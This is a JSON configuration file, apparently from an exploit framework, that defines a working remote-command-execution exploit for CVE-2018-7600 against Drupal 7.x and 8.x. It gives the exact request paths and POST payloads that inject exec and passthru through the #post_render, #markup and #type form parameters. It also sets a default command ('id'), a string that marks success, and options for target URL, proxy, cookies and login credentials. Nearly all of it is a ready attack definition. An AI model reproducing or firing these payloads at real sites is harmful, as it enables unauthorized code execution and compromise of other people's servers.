config.json

{"DATE":"2018-04-17","USAGE":" --url URL --command COMMAND --tstring TSTRING","REQUIRED_ARGUMENTS":"!$url || !$command || !$tstring","ARGUMENTS":{"VERBOSE":{},"verbose":{"TYPE":"g","DESCRIPTION":"Be More Verbose","VARIABLE":"VERBOSE","NAME":"verbose"},"proxy":{"NAME":"proxy","VARIABLE":"proxy","DESCRIPTION":"Proxy Server To Use [Format: scheme://host:port]","TYPE":"s"},"command":{"NAME":"command","VARIABLE":"command","VARIABLE_VALUE":"id","DESCRIPTION":"The command to execute","TYPE":"s"},"tstring":{"NAME":"tstring","VARIABLE":"tstring","DESCRIPTION":"The string to match when the exploit should be considered as a success","VARIABLE_VALUE":" uid=","TYPE":"s"},"url":{"VARIABLE":"url","NAME":"url","DESCRIPTION":"The Target URL [Format: scheme://host]","TYPE":"s"},"help":{"VARIABLE":"Help","NAME":"help","DESCRIPTION":"Display The Help Menu","TYPE":"f"},"cookie_string":{"VARIABLE":"cookie_string","NAME":"cookie","DESCRIPTION":"Cookie String To Use","TYPE":"s"},"DEBUG":{},"debug":{"DESCRIPTION":"Debug Mode","VARIABLE":"DEBUG","NAME":"debug","TYPE":"g"},"useragent":{"TYPE":"s","VARIABLE_VALUE":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0","DESCRIPTION":"User-Agent To Send To Server","VARIABLE":"useragent","NAME":"user-agent"},"timeout":{"VARIABLE":"timeout","NAME":"timeout","VARIABLE_VALUE":"30","DESCRIPTION":"Max Timeout For The HTTP Requests","TYPE":"i"},"auth":{"VARIABLE":"auth","NAME":"auth","DESCRIPTION":"Credentials To Use For HTTP Login [Format: username:password]","TYPE":"s"},"Help":{}},"EXPLOITDB":"44482","EXPLOIT_HEADER":"","ESCAPED_NAME":"CVE-2018-7600","AUTHOR":"José Ignacio Rojo","REFERENCES":["https://nvd.nist.gov/vuln/detail/CVE-2018-7600","https://www.cvedetails.com/cve/CVE-2018-7600/","http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600","https://www.exploit-db.com/exploits/44448/","https://www.exploit-db.com/exploits/44449/","https://www.exploit-db.com/exploits/44482/","https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html","https://www.debian.org/security/2018/dsa-4156","http://www.securityfocus.com/bid/103534","http://www.securitytracker.com/id/1040598","https://exploit-db.com/exploits/44448/","https://exploit-db.com/raw/44448/","https://exploit-db.com/exploits/44449/","https://exploit-db.com/raw/44449/","https://exploit-db.com/exploits/44482/","https://exploit-db.com/raw/44482/"],"NAME":"CVE-2018-7600","REQUESTS":{"EXPLOIT1":{"PATH":"/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax","TEXT":"Sending the first exploit request on /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax","HEADERS":{},"PAYLOAD":"form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=\\$command","METHOD":"POST","CONTENT-TYPE":"application/x-www-form-urlencoded"},"EXPLOIT3":{"VALIDATION":{"TSTRING":["$tstring"]},"PATH":"/?q=file/ajax/name/#value/$form_build_id","TEXT":"Sending test 2 request #2 on /?q=file/ajax/name/#value/\\$form_build_id","HEADERS":{},"PAYLOAD":"form_build_id=\\$form_build_id","METHOD":"POST","CONTENT-TYPE":"application/x-www-form-urlencoded"},"EXPLOIT2":{"PATH":"/?q=user/password&name[#post_render][]=passthru&name[#markup]=$command&name[#type]=markup","VALIDATION":{"TSTRING":["<input type=\"hidden\" name=\"form_build_id\" value=\""]},"TEXT":"Sending second test request #1 on /?q=user/password&name[#post_render][]=passthru&name[#markup]=\\$command&name[#type]=markup","HEADERS":{},"PAYLOAD":"form_id=user_pass&_triggering_element_name=name","METHOD":"POST","CONTENT-TYPE":"application/x-www-form-urlencoded"}},"HELP":"\n            --url [VALUE]\t\t: The Target URL [Format: scheme://host]\n            --user-agent [VALUE]\t\t: User-Agent To Send To Server\n            --cookie [VALUE]\t\t: Cookie String To Use\n            --proxy [VALUE]\t\t: Proxy Server To Use [Format: scheme://host:port]\n            --timeout [VALUE]\t\t: Max Timeout For The HTTP Requests\n            --auth [VALUE]\t\t: Credentials To Use For HTTP Login [Format: username:password]\n            --help        \t\t: Display The Help Menu\n            --verbose        \t\t: Be More Verbose\n            --debug        \t\t: Debug Mode\n            --command [VALUE]\t\t: The command to execute\n            --tstring [VALUE]\t\t: The string to match when the exploit should be considered as a success","TITLE":"<","VERSIONS":["7.X","8.X"],"CVE":"CVE-2018-7600"}